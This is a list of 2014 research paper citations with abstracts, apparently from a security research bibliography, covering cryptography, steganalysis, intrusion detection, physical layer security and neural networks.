  • aheti, Ankita; Singh, Lokesh; Khan, Asif Ullah, "Proposed Method for Multimedia Data Security Using Cyclic Elliptic Curve, Chaotic System, and Authentication Using Neural Network," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.664,668, 7-9 April 2014. (ID#:14-1685) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821481&isnumber=6821334 As multimedia applications are used increasingly, security becomes an important issue of security of images. The combination of chaotic theory and cryptography forms an important field of information security. In the past decade, chaos based image encryption is given much attention in the research of information security and a lot of image encryption algorithms based on chaotic maps have been proposed. But, most of them delay the system performance, security, and suffer from the small key space problem. This paper introduces an efficient symmetric encryption scheme based on a cyclic elliptic curve and chaotic system that can overcome these disadvantages. The cipher encrypts 256-bit of plain image to 256-bit of cipher image within eight 32-bit registers. The scheme generates pseudorandom bit sequences for round keys based on a piecewise nonlinear chaotic map. Then, the generated sequences are mixed with the key sequences derived from the cyclic elliptic curve points. The proposed algorithm has good encryption effect, large key space, high sensitivity to small change in secret keys and fast compared to other competitive algorithms. Keywords: Authentication; Chaotic communication; Elliptic curves; Encryption; Media; Multimedia communication; authentication; chaos; decryption; encryption; neural network
  • Abercrombie, R.K.; Schlicher, B.G.; Sheldon, F.T., "Security Analysis of Selected AMI Failure Scenarios Using Agent Based Game Theoretic Simulation," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.2015,2024, 6-9 Jan. 2014. (ID#:14-1686) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6758853&isnumber=6758592 Information security analysis can be performed using game theory implemented in dynamic Agent Based Game Theoretic (ABGT) simulations. Such simulations can be verified with the results from game theory analysis and further used to explore larger scale, real world scenarios involving multiple attackers, defenders, and information assets. We concentrated our analysis on the Advanced Metering Infrastructure (AMI) functional domain which the National Electric Sector Cyber security Organization Resource (NESCOR) working group has currently documented 29 failure scenarios. The strategy for the game was developed by analyzing five electric sector representative failure scenarios contained in the AMI functional domain. From these five selected scenarios, we characterize them into three specific threat categories affecting confidentiality, integrity and availability (CIA). The analysis using our ABGT simulation demonstrates how to model the AMI functional domain using a set of rationalized game theoretic rules decomposed from the failure scenarios in terms of how those scenarios might impact the AMI network with respect to CIA. Keywords: game theory; security of data; ABGT simulations; AMI failure scenarios; CIA; NESCOR; advanced metering infrastructure functional domain; agent based game theoretic simulation; confidentiality integrity and availability; information security analysis; national electric sector cyber security organization resource; Analytical models; Availability; Computational modeling; Computer security; Game theory; Games; AMI Failure Scenarios; Advanced Metering Infrastructure; Agent Based Simulation; Availability; Confidentiality; Integrity; Risk Management; Simulation; Smart Grid Cyber Security Analysis
  • Mukherjee, A.; Fakoorian, S.; Huang, J.; Swindlehurst, A., "Principles of Physical Layer Security in Multiuser Wireless Networks: A Survey," Communications Surveys & Tutorials, IEEE, vol.PP, no.99, pp.1,24, February 2014. (ID#:14-1687) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6739367&isnumber=5451756 This paper provides a comprehensive review of the domain of physical layer security in multiuser wireless networks. The essential premise of physical layer security is to enable the exchange of confidential messages over a wireless medium in the presence of unauthorized eavesdroppers, without relying on higher-layer encryption. This can be achieved primarily in two ways: without the need for a secret key by intelligently designing transmit coding strategies, or by exploiting the wireless communication medium to develop secret keys over public channels. The survey begins with an overview of the foundations dating back to the pioneering work of Shannon and Wyner on information-theoretic security. We then describe the evolution of secure transmission strategies from point-to-point channels to multiple-antenna systems, followed by generalizations to multiuser broadcast, multiple-access, interference, and relay networks. Secret-key generation and establishment protocols based on physical layer mechanisms are subsequently covered. Approaches for secrecy based on channel coding design are then examined, along with a description of inter-disciplinary approaches based on game theory and stochastic geometry. The associated problem of physical layer message authentication is also briefly introduced. The survey concludes with observations on potential research directions in this area. Keywords: Information-theoretic security; Physical layer security; artificial noise; cooperative jamming; secrecy; secret-key agreement; wiretap channel
  • Kodovsky, J.; Fridrich, J., "Effect of Image Downsampling on Steganographic Security," Information Forensics and Security, IEEE Transactions on , vol.9, no.5, pp.752,762, May 2014. (ID#:14-1688) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6750732&isnumber=6776454 The accuracy of steganalysis in digital images primarily depends on the statistical properties of neighboring pixels, which are strongly affected by the image acquisition pipeline as well as any processing applied to the image. In this paper, we study how the detectability of embedding changes is affected when the cover image is downsampled prior to embedding. This topic is important for practitioners because the vast majority of images posted on websites, image sharing portals, or attached to e-mails are downsampled. It is also relevant to researchers as the security of steganographic algorithms is commonly evaluated on databases of downsampled images. In the first part of this paper, we investigate empirically how the steganalysis results depend on the parameters of the resizing algorithm-the choice of the interpolation kernel, the scaling factor (resize ratio), antialiasing, and the downsampled pixel grid alignment. We report on several novel phenomena that appear valid universally across the tested cover sources, steganographic methods, and steganalysis features. This paper continues with a theoretical analysis of the simplest interpolation kernel - the box kernel. By fitting a Markov chain model to pixel rows, we analytically compute the Fisher information rate for any mutually independent embedding operation and derive the proper scaling of the secure payload with resizing. For least significant bit (LSB) matching and a limited range of downscaling, the theory fits experiments rather well, which indicates the existence of a new scaling law expressing the length of the secure payload when the cover size is modified by subsampling. Keywords: Markov processes; image matching; sampling methods; steganography; Fisher information rate; LSB matching; Markov chain model; Web sites; antialiasing; cover image; digital images; downsampled pixel grid alignment; e-mail attachment; electronic mail; embedding changes; image acquisition pipeline; image downsampling; image processing; image sharing portals ;interpolation kernel; least significant bit matching; mutually independent embedding operation; resize ratio ;scaling factor; statistical properties; steganalysis; steganographic algorithms; steganographic security; subsampling; Databases; Electronic mail;Interpolation;Kernel;Payloads;Security;Testing;Steganographic security ;image downsampling; steganalysis
  • Stanisavljevic, Z.; Stanisavljevic, J.; Vuletic, P.; Jovanovic, Z., "COALA - System for Visual Representation of Cryptography Algorithms," Learning Technologies, IEEE Transactions on, vol.PP, no.99, pp.1,1, April 2014. (ID#:14-1689) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6784486&isnumber=4620077 Educational software systems have an increasingly significant presence in engineering sciences. They aim to improve students' attitudes and knowledge acquisition typically through visual representation and simulation of complex algorithms and mechanisms or hardware systems that are often not available to the educational institutions. This paper presents a novel software system for CryptOgraphic ALgorithm visuAl representation (COALA), which was developed to support a Data Security course at the School of Electrical Engineering, University of Belgrade. The system allows users to follow the execution of several complex algorithms (DES, AES, RSA, and Diffie- Hellman) on real world examples in a step by step detailed view with the possibility of forward and backward navigation. Benefits of the COALA system for students are observed through the increase of the percentage of students who passed the exam and the average grade on the exams during one school year. Keywords: Algorithm design and analysis; Cryptography; Data visualization; Software algorithms; Visualization
  • Threepak, T.; Watcharapupong, A., "Web attack detection using entropy-based analysis," Information Networking (ICOIN), 2014 International Conference on , vol., no., pp.244,247, 10-12 Feb. 2014. (ID#:14-1690) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6799699&isnumber=6799467 Web attacks are increases both magnitude and complexity. In this paper, we try to use the Shannon entropy analysis to detect these attacks. Our approach examines web access logging text using the principle that web attacking scripts usually have more sophisticated request patterns than legitimate ones. Risk level of attacking incidents are indicated by the average (AVG) and standard deviation (SD) of each entropy period, i.e., Alpha and Beta lines which are equal to AVG-SD and AVG-2*SD, respectively. They represent boundaries in detection scheme. As the result, our technique is not only used as high accurate procedure to investigate web request anomaly behaviors, but also useful to prune huge application access log files and focus on potential intrusive events. The experiments show that our proposed process can detect anomaly requests in web application system with proper effectiveness and low false alarm rate. Keywords: entropy; security of data; AVG-SD; Shannon entropy analysis; Web access logging text; Web attack detection; Web attacking scripts; Web request anomaly behaviors; entropy-based analysis; intrusive events; standard deviation; C omplexity theory; Entropy; Equations; Intrusion detection; Mathematical model; Standards; Anomaly Detection; Entropy Analysis ;Information Security
  • Jiantao Zhou; Xianming Liu; Au, O.C.; Yuan Yan Tang, "Designing an Efficient Image Encryption-Then-Compression System via Prediction Error Clustering and Random Permutation," Information Forensics and Security, IEEE Transactions on , vol.9, no.1, pp.39,50, Jan. 2014. (ID#:14-1691) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6670767&isnumber=6684617 In many practical scenarios, image encryption has to be conducted prior to image compression. This has led to the problem of how to design a pair of image encryption and compression algorithms such that compressing the encrypted images can still be efficiently performed. In this paper, we design a highly efficient image encryption-then-compression (ETC) system, where both lossless and lossy compression are considered. The proposed image encryption scheme operated in the prediction error domain is shown to be able to provide a reasonably high level of security. We also demonstrate that an arithmetic coding-based approach can be exploited to efficiently compress the encrypted images. More notably, the proposed compression approach applied to encrypted images is only slightly worse, in terms of compression efficiency, than the state-of-the-art lossless/lossy image coders, which take original, unencrypted images as inputs. In contrast, most of the existing ETC solutions induce significant penalty on the compression efficiency. Keywords: arithmetic codes; data compression; image coding; pattern clustering; prediction theory; random codes; ETC; arithmetic coding-based approach; image encryption-then-compression system design ;lossless compression; lossless image coder; lossy compression; lossy image coder; prediction error clustering; random permutation; security; Bit rate; Decoding; Encryption ;Image coding; Image reconstruction; Compression of encrypted image; encrypted domain signal processing
  • Portmann, C., "Key Recycling in Authentication," Information Theory, IEEE Transactions on , vol.60, no.7, pp.4383,4396, July 2014. (ID#:14-1692) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6797875&isnumber=6832684 In their seminal work on authentication, Wegman and Carter propose that to authenticate multiple messages, it is sufficient to reuse the same hash function as long as each tag is encrypted with a one-time pad. They argue that because the one-time pad is perfectly hiding, the hash function used remains completely unknown to the adversary. Since their proof is not composable, we revisit it using a composable security framework. It turns out that the above argument is insufficient: if the adversary learns whether a corrupted message was accepted or rejected, information about the hash function is leaked, and after a bounded finite amount of rounds it is completely known. We show however that this leak is very small: Wegman and Carter's protocol is still ( varepsilon ) -secure, if ( varepsilon ) -almost strongly universal (_2) hash functions are used. This implies that the secret key corresponding to the choice of hash function can be reused in the next round of authentication without any additional error than this ( varepsilon ) . We also show that if the players have a mild form of synchronization, namely that the receiver knows when a message should be received, the key can be recycled for any arbitrary task, not only new rounds of authentication. Keywords: Abstracts; Authentication; Computational modeling; Cryptography; Protocols; Recycling; Cryptography; authentication; composable security; information-theoretic security
  • Jain, S.; Bhatnagar, V., "Analogy of various DNA based security algorithms using cryptography and steganography," Issues and Challenges in Intelligent Computing Techniques (ICICT), 2014 International Conference on , vol., no., pp.285,291, 7-8 Feb. 2014. (ID#:14-1693) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781294&isnumber=6781240 In today's era Information technology is growing day by day. The rate of information storage and transformation is growing day by day. So information security is becoming more important. Everyone wants to protect its information from attackers and hackers. To provide security to information there are various algorithms of traditional cryptography and steganography. New field DNA cryptography emerges to provide security to data store in DNA. The DNA cryptography uses the Bio-Molecular computational abilities of DNA. In this paper authors compare the various DNA cryptographic algorithms on certain key and important parameters. These parameters would also help the future researchers to design or improve the DNA storage techniques for secure data storage in more efficient and reliable manner. The authors also explain the different biological and arithmetic operators use in the DNA cryptographic algorithms. Keywords: DNA; cryptography; information storage; steganography; DNA based security algorithms; DNA cryptography; DNA storage techniques; arithmetic operators; biological operators; biomolecular computational abilities; information security; information storage; information technology; information transformation; steganography; Biological information theory; DNA; Encryption; Facsimile; Arithmetic; Biological; Cryptography; DNA; Steganography
  • Arya, A.; Kumar, S., "Information theoretic feature extraction to reduce dimensionality of Genetic Network Programming based intrusion detection model," Issues and Challenges in Intelligent Computing Techniques (ICICT), 2014 International Conference on , vol., no., pp.34,37, 7-8 Feb. 2014. (ID#:14-1694) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781248&isnumber=6781240 Intrusion detection techniques require examining high volume of audit records so it is always challenging to extract minimal set of features to reduce dimensionality of the problem while maintaining efficient performance. Previous researchers analyzed Genetic Network Programming framework using all 41 features of KDD cup 99 dataset and found the efficiency of more than 90% at the cost of high dimensionality. We are proposing a new technique for the same framework with low dimensionality using information theoretic approach to select minimal set of features resulting in six attributes and giving the accuracy very close to their result. Feature selection is based on the hypothesis that all features are not at same relevance level with specific class. Simulation results with KDD cup 99 dataset indicates that our solution is giving accurate results as well as minimizing additional overheads. Keywords: feature extraction; feature selection; genetic algorithms; information theory; security of data; KDD cup 99 dataset; audit records; dimensionality reduction; feature selection; genetic network programming based intrusion detection model; information theoretic feature extraction; Artificial intelligence; Correlation; Association rule; Discretization; Feature Selection; GNP
  • Hyunho Kang; Hori, Y.; Katashita, T.; Hagiwara, M.; Iwamura, K., "Cryptographie key generation from PUF data using efficient fuzzy extractors," Advanced Communication Technology (ICACT), 2014 16th International Conference on , vol., no., pp.23,26, 16-19 Feb. 2014. (ID#:14-1695) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6778915&isnumber=6778899 or http://dx.doi.org/10.1016/j.tcs.2013.09.008 Physical unclonable functions (PUFs) and biometrics are inherently noisy. When used in practice as cryptographic key generators, they need to be combined with an extraction technique to derive reliable bit strings (i.e., cryptographic key). An approach based on an error correcting code was proposed by Dodis et al. and is known as a fuzzy extractor. However, this method appears to be difficult for non-specialists to implement. In our recent study, we reported the results of some example implementations using PUF data and presented a detailed implementation diagram. In this paper, we describe a more efficient implementation method by replacing the hash function output with the syndrome from the BCH code. The experimental results show that the Hamming distance between two keys vary according to the key size and information-theoretic security has been achieved. Keywords: Hamming codes; cryptography; error correction codes; fuzzy set theory; BCH code; Hamming distance; PUF data; biometrics; cryptographic key generation; efficient fuzzy extractors; error correcting code ;information-theoretic security; physical unclonable functions; reliable bit strings; Cryptography; Data mining; Entropy; Hamming distance; High definition video; Indexes; Reliability; Arbiter PUF; Fuzzy Extractor; Physical Unclonable Functions
  • Joshua D. Guttman, "Establishing and Preserving Protocol Security Goals," Journal of Computer Security - Foundational Aspects of Security, Volume 22 Issue 2, March 2014, ( Pages 203-267). (ID#:14-1696) Available at: http://dl.acm.org/citation.cfm?id=2595841.2595843 We take a model-theoretic viewpoint on security goals and how to establish them. The models are possibly fragmentary executions. Security goals such as authentication and confidentiality are geometric sequents, i.e. implications F-Ps where F and Ps are built from atomic formulas without negations, implications, or universal quantifiers. Security goals are then statements about homomorphisms, where the source is a minimal fragmentary model of the antecedent F. If every homomorphism to a non-fragmentary, complete execution factors through a model in which Ps is satisfied, then the goal is achieved. One can validate security goals via a process of information enrichment. We call this approach enrich-by-need protocol analysis.This idea also clarifies protocol transformation. A protocol transformation preserves security goals when it preserves the form of the information enrichment process. We formalize this idea using simulation relations between labeled transition systems. These labeled transition systems formalize the analysis of the protocols, i.e. the information enrichment process, not the execution behavior of the protocols. Keywords: Authentication, Cryptographic Protocol Analysis, Security Properties, Strand Spaces
  • Guomin Yang, Chik How Tan, Yi Mu, Willy Susilo, Duncan S. Wong, "Identity Based Identification From Algebraic Coding Theory," Theoretical Computer Science, Volume 520, February, 2014,(Pages 51-61). (ID#:14-1697) Available at: http://dl.acm.org/citation.cfm?id=2567013.2567369&coll=DL&dl=GUIDE&CFID=485004180&CFTOKEN=38695484 or http://dx.doi.org/10.1016/j.tcs.2013.09.008 Cryptographic identification schemes allow a remote user to prove his/her identity to a verifier who holds some public information of the user, such as the user public key or identity. Most of the existing cryptographic identification schemes are based on number-theoretic hard problems such as Discrete Log and Factorization. This paper focuses on the design and analysis of identity based identification (IBI) schemes based on algebraic coding theory. We first revisit an existing code-based IBI scheme which is derived by combining the Courtois-Finiasz-Sendrier signature scheme and the Stern zero-knowledge identification scheme. Previous results have shown that this IBI scheme is secure under passive attacks. In this paper, we prove that the scheme in fact can resist active attacks. However, whether the scheme can be proven secure under concurrent attacks (the most powerful attacks against identification schemes) remains open. In addition, we show that it is difficult to apply the conventional OR-proof approach to this particular IBI scheme in order to obtain concurrent security. We then construct a special OR-proof variant of this scheme and prove that the resulting IBI scheme is secure under concurrent attacks. Keywords: Error-correcting codes, Identification, Identity based cryptography, Syndrome decoding
  • Yi-Kai Liu, "Building One-Time Memories From Isolated Qubits: (extended abstract) Proceedings of the 5th Conference On Innovations In Theoretical Computer Science January 2014, (Pages 269-286). (ID#:14-1698) Available at: http://dx.doi.org/10.1145/2554797.2554823 One-time memories (OTM's) are simple tamper-resistant cryptographic devices, which can be used to implement one-time programs, a very general form of software protection and program obfuscation. Here we investigate the possibility of building OTM's using quantum mechanical devices. It is known that OTM's cannot exist in a fully-quantum world or in a fully-classical world. Instead, we propose a new model based on isolated qubits - qubits that can only be accessed using local operations and classical communication (LOCC). This model combines a quantum resource (single-qubit measurements) with a classical restriction (on communication between qubits), and can be implemented using current technologies, such as nitrogen vacancy centers in diamond. In this model, we construct OTM's that are information-theoretically secure against one-pass LOCC adversaries that use 2-outcome measurements. Our construction resembles Wiesner's old idea of quantum conjugate coding, implemented using random error-correcting codes; our proof of security uses entropy chaining to bound the supremum of a suitable empirical process. In addition, we conjecture that our random codes can be replaced by some class of efficiently-decodable codes, to get computationally-efficient OTM's that are secure against computationally-bounded LOCC adversaries. In addition, we construct data-hiding states, which allow an LOCC sender to encode an (n-O(1))-bit messsage into n qubits, such that at most half of the message can be extracted by a one-pass LOCC receiver, but the whole message can be extracted by a general quantum receiver. Keywords: conjugate coding, cryptography, data-hiding states, local operations and classical communication, oblivious transfer, one-time programs, quantum computation

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Neural Networks

Neural Networks


Artificial neural networks have been used to solve a wide variety of tasks that are hard to solve using ordinary rule-based programming. What has attracted much interest in neural networks is the possibility of learning. Tasks such as function approximation, classification pattern and sequence recognition, anomoly detection, filtering, clustering, blind source separation and compression and controls all have security implications. The work cited here looks at authentication, use of learning to develop a hybrid security system, and attack behavior classification in artificial neural networks.

  • Baheti, Ankita; Singh, Lokesh; Khan, Asif Ullah, "Proposed Method for Multimedia Data Security Using Cyclic Elliptic Curve, Chaotic System, and Authentication Using Neural Network," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.664,668, 7-9 April 2014. (ID#:14-1710) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821481&isnumber=6821334 As multimedia applications are used increasingly, security becomes an important issue of security of images. The combination of chaotic theory and cryptography forms an important field of information security. In the past decade, chaos based image encryption is given much attention in the research of information security and a lot of image encryption algorithms based on chaotic maps have been proposed. But, most of them delay the system performance, security, and suffer from the small key space problem. This paper introduces an efficient symmetric encryption scheme based on a cyclic elliptic curve and chaotic system that can overcome these disadvantages. The cipher encrypts 256-bit of plain image to 256-bit of cipher image within eight 32-bit registers. The scheme generates pseudorandom bit sequences for round keys based on a piecewise nonlinear chaotic map. Then, the generated sequences are mixed with the key sequences derived from the cyclic elliptic curve points. The proposed algorithm has good encryption effect, large key space, high sensitivity to small change in secret keys and fast compared to other competitive algorithms. Keywords: Authentication; Chaotic communication; Elliptic curves; Encryption; Media; Multimedia communication; authentication; chaos; decryption; encryption; neural network
  • Singh, Nikita; Chandra, Nidhi, "Integrating Machine Learning Techniques to Constitute a Hybrid Security System," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.1082,1087, 7-9 April 2014. (ID#:14-1711) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821566&isnumber=6821334 Computer Security has been discussed and improvised in many forms and using different techniques as well as technologies. The enhancements keep on adding as the security remains the fastest updating unit in a computer system. In this paper we propose a model for securing the system along with the network and enhance it more by applying machine learning techniques SVM (support vector machine) and ANN (Artificial Neural Network). Both the techniques are used together to generate results which are appropriate for analysis purpose and thus, prove to be the milestone for security. Keywords: Artificial neural networks; Intrusion detection; Neurons; Probabilistic logic; Support vector machines; Training; Artificial neural network; Host logs; Machine Learning; Network logs; Support vector machine
  • Abdul Razzaq, Khalid Latif, H. Farooq Ahmad, Ali Hur, Zahid Anwar, Peter Charles Bloodsworth, "Semantic Security Against Web Application Attacks," Information Sciences: an International Journal, Volume 254, January, 2014. (ID#:14-1712) Available at: http://dl.acm.org/citation.cfm?id=2535053.2535251&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 This paper proposes an ontology-based method for the detection and identification of web application attacks, including zero day attacks, with few false positives. This ontology-based solution, as opposed to current signature-based methods, classifies web application attacks by employing semantic rules to identify the application context, probable attacks, and protocol used. The rules allow detection of complex variations of web application attacks, as well as provide for a platform and technology independent system. Keywords: Application security, Semantic rule engine, Semantic security
  • Al-Jarrah, Omar; Arafat, Ahmad, "Network Intrusion Detection System Using Attack Behavior Classification," Information and Communication Systems (ICICS), 2014 5th International Conference on , vol., no., pp.1,6, 1-3 April 2014. (ID#:14-1713) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6841978&isnumber=6841931 Intrusion Detection Systems (IDS) have become a necessity in computer security systems because of the increase in unauthorized accesses and attacks. Intrusion Detection is a major component in computer security systems that can be classified as Host-based Intrusion Detection System (HIDS), which protects a certain host or system and Network-based Intrusion detection system (NIDS), which protects a network of hosts and systems. This paper addresses Probes attacks or reconnaissance attacks, which try to collect any possible relevant information in the network. Network probe attacks have two types: Host Sweep and Port Scan attacks. Host Sweep attacks determine the hosts that exist in the network, while port scan attacks determine the available services that exist in the network. This paper uses an intelligent system to maximize the recognition rate of network attacks by embedding the temporal behavior of the attacks into a TDNN neural network structure. The proposed system consists of five modules: packet capture engine, preprocessor, pattern recognition, classification, and monitoring and alert module. We have tested the system in a real environment where it has shown good capability in detecting attacks. In addition, the system has been tested using DARPA 1998 dataset with 100% recognition rate. In fact, our system can recognize attacks in a constant time. Keywords: IP networks ;Intrusion detection; Neural networks ;Pattern recognition; Ports (Computers); Probes; Protocols; Host sweep; Intrusion Detection Systems; Network probe attack; Port scan; TDNN neural network
  • Singla, P.; Sachdeva, P.; Ahmad, M., "A Chaotic Neural Network Based Cryptographic Pseudo-Random Sequence Design," Advanced Computing & Communication Technologies (ACCT), 2014 Fourth International Conference on , vol., no., pp.301,306, 8-9 Feb. 2014. (ID#:14-1714) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6783468&isnumber=6783406 Efficient random sequence generators are significant in the application areas of cryptographic stream cipher design, statistical sampling and simulation, direct spread spectrum, etc. A cryptographically efficient pseudo-random sequence should have the characteristics of high randomness and encryption effect. The statistical quality of pseudo-random sequences determines the strength of cryptographic system. The generation of pseudo-random sequences with high randomness and encryption effect is a key challenge. A sequence with poor randomness threatens the security of cryptographic system. In this paper, the features and strengths of chaos and neural network are combined to design a novel pseudo-random binary sequence generator for cryptographic applications. The statistical performance of the proposed chaotic neural network based pseudo random sequence generator is examined against the NIST SP800-22 randomness tests and multimedia image encryption. The results of investigations are promising and depict its relevance for cryptographic applications. Keywords: chaos; cryptography; neural nets; random sequences; sampling methods; chaotic neural network based cryptographic pseudo-random sequence design; cryptographic stream cipher design; cryptographic system security; cryptographic system strength determination; direct spread spectrum; encryption effect characteristics; high randomness characteristics; statistical sampling; statistical simulation; Biological neural networks; Chaotic communication; Encryption; Generators; Chaotic; cryptography; image encryption; neural network; pseudo-random sequence generator
  • Khatri, P., "Using identity and trust with key management for achieving security in Ad hoc Networks," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.271,275, 21-22 Feb. 2014. (ID#:14-1715) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779333&isnumber=6779283 Communication in Mobile Ad hoc network is done over a shared wireless channel with no Central Authority (CA) to monitor. Responsibility of maintaining the integrity and secrecy of data, nodes in the network are held responsible. To attain the goal of trusted communication in MANET (Mobile Ad hoc Network) lot of approaches using key management has been implemented. This work proposes a composite identity and trust based model (CIDT) which depends on public key, physical identity, and trust of a node which helps in secure data transfer over wireless channels. CIDT is a modified DSR routing protocol for achieving security. Trust Factor of a node along with its key pair and identity is used to authenticate a node in the network. Experience based trust factor (TF) of a node is used to decide the authenticity of a node. A valid certificate is generated for authentic node to carry out the communication in the network. Proposed method works well for self certification scheme of a node in the network. Keywords: data communication; mobile ad hoc networks routing protocols; telecommunication security; wireless channels; MANET; ad hoc networks; central authority; data integrity; data secrecy; experience based trust factor; identity model; key management; mobile ad hoc network ;modified DSR routing protocol; physical identity; public key; secure data transfer; security; self certification scheme; shared wireless channel; trust factor; trust model; trusted communication; wireless channels; Artificial neural networks; Mobile ad hoc networks; Protocols; Public key; Servers; Certificate; MANET; Public key; Secret key; Trust Model
  • Kumar, D.; Gupta, S.; Sehgal, P., "Comparing gradient based learning methods for optimizing predictive neural networks," Engineering and Computational Sciences (RAECS), 2014 Recent Advances in , vol., no., pp.1,6, 6-8 March 2014a. (ID#:14-1716) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6799573&isnumber=6799496 In this paper, we compare the performance of various gradient based techniques in optimizing the neural networks employed for prediction modeling. Training of neural network based predictive models is done using gradient based techniques, which involves searching for the point of minima on multidimensional energy function by providing step-wise corrective adjustment of weight vector present in hidden layers. Convergence of different gradient techniques is studied and compared by performing experiments in neural network toolbox package of MATLAB. Bulky data sets extracted from live data warehouse of life insurance sector are employed with gradient methods for developing the predictive models. Convergence behaviors of learning methods - gradient descent method, Levenberg Marquardt method, conjugate gradient method and scaled conjugate gradient method have been observed. Keywords: conjugate gradient methods; data warehouses; learning (artificial intelligence); neural nets; Levenberg Marquardt method; MATLAB; bulky data sets; convergence behavior; gradient based learning method; gradient based techniques; gradient descent method; gradient techniques; life insurance sector; live data warehouse; multidimensional energy function; neural network based predictive models; neural network toolbox package; prediction modeling; predictive neural networks; scaled conjugate gradient method; step-wise corrective adjustment; weight vector; Convergence; Gradient methods; Neural networks; Neurons; Predictive models; Training; Vectors; conjugate gradient; gradient methods; learning algorithms; neural networks; nonlinear optimization
  • Zhang, H.; Wang, Z.; Liu, D., "A Comprehensive Review of Stability Analysis of Continuous-Time Recurrent Neural Networks," Neural Networks and Learning Systems, IEEE Transactions on , vol.25, no.7, pp.1229,1262, July 2014. (ID#:14-1717) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814892&isnumber=6828828 Stability problems of continuous-time recurrent neural networks have been extensively studied, and many papers have been published in the literature. The purpose of this paper is to provide a comprehensive review of the research on stability of continuous-time recurrent neural networks, including Hopfield neural networks, Cohen-Grossberg neural networks, and related models. Since time delay is inevitable in practice, stability results of recurrent neural networks with different classes of time delays are reviewed in detail. For the case of delay-dependent stability, the results on how to deal with the constant/variable delay in recurrent neural networks are summarized. The relationship among stability results in different forms, such as algebraic inequality forms, (M) -matrix forms, linear matrix inequality forms, and Lyapunov diagonal stability forms, is discussed and compared. Some necessary and sufficient stability conditions for recurrent neural networks without time delays are also discussed. Concluding remarks and future directions of stability analysis of recurrent neural networks are given. Keywords: Biological neural networks; Delays; Neurons; ecurrent neural networks; Stability criteria;(M) -matrix; Cohen--Grossberg neural networks; Cohen-Grossberg neural networks; Hopfield neural networks; Lyapunov diagonal stability (LDS); M-matrix; discrete delay; distributed delays; linear matrix inequality (LMI); recurrent neural networks; robust stability; stability
  • Yu Wang; Boxun Li; Rong Luo; Yiran Chen; Ningyi Xu; Huazhong Yang, "Energy efficient neural networks for big data analytics," Design, Automation and Test in Europe Conference and Exhibition (DATE), 2014 , vol., no., pp.1,2, 24-28 March 2014. (ID#:14-1718) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6800559&isnumber=6800201 The world is experiencing a data revolution to discover knowledge in big data. Large scale neural networks are one of the mainstream tools of big data analytics. Processing big data with large scale neural networks includes two phases: the training phase and the operation phase. Huge computing power is required to support the training phase. And the energy efficiency (power efficiency) is one of the major considerations of the operation phase. We first explore the computing power of GPUs for big data analytics and demonstrate an efficient GPU implementation of the training phase of large scale recurrent neural networks (RNNs). We then introduce a promising ultrahigh energy efficient implementation of neural networks' operation phase by taking advantage of the emerging memristor technique. Experiment results show that the proposed GPU implementation of RNNs is able to achieve 2 ~ 11x speed-up compared with the basic CPU implementation. And the scaled-up recurrent neural network trained with GPUs realizes an accuracy of 47% on the Microsoft Research Sentence Completion Challenge, the best result achieved by a single RNN on the same dataset. In addition, the proposed memristor-based implementation of neural networks demonstrates power efficiency of > 400 GFLOPS/W and achieves energy savings of 22x on the HMAX model compared with its pure digital implementation counterpart. Keywords: data analysis; electronic engineering computing; graphics processing units; memristors; recurrent neural nets; CPU implementation; GPU implementation; HMAX model; RNNs; big data analytics; energy efficient neural networks; large scale recurrent neural networks; memristor technique; neural networks operation phase; neural networks training phase; power efficiency; Data handling; Data storage systems; Information management; Memristors; Recurrent neural networks; Training
  • Rakkiyappan, R.; Cao, J.; Velmurugan, G., "Existence and Uniform Stability Analysis of Fractional-Order Complex-Valued Neural Networks With Time Delays," Neural Networks and Learning Systems, IEEE Transactions on, vol. PP, no.99, pp.1,1, March 2014. (ID#:14-1719) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781037&isnumber=6104215 This paper deals with the problem of existence and uniform stability analysis of fractional-order complex-valued neural networks with constant time delays. Complex-valued recurrent neural networks is an extension of real-valued recurrent neural networks that includes complex-valued states, connection weights, or activation functions. This paper explains sufficient condition for the existence and uniform stability analysis of such networks. Three numerical simulations are delineated to substantiate the effectiveness of the theoretical results. Keywords: Artificial neural networks; Biological neural networks; Delay effects; Mathematics; Recurrent neural networks; Stability analysis; Banach contraction fixed point theorem; complex-valued neural networks; fractional order; time delays
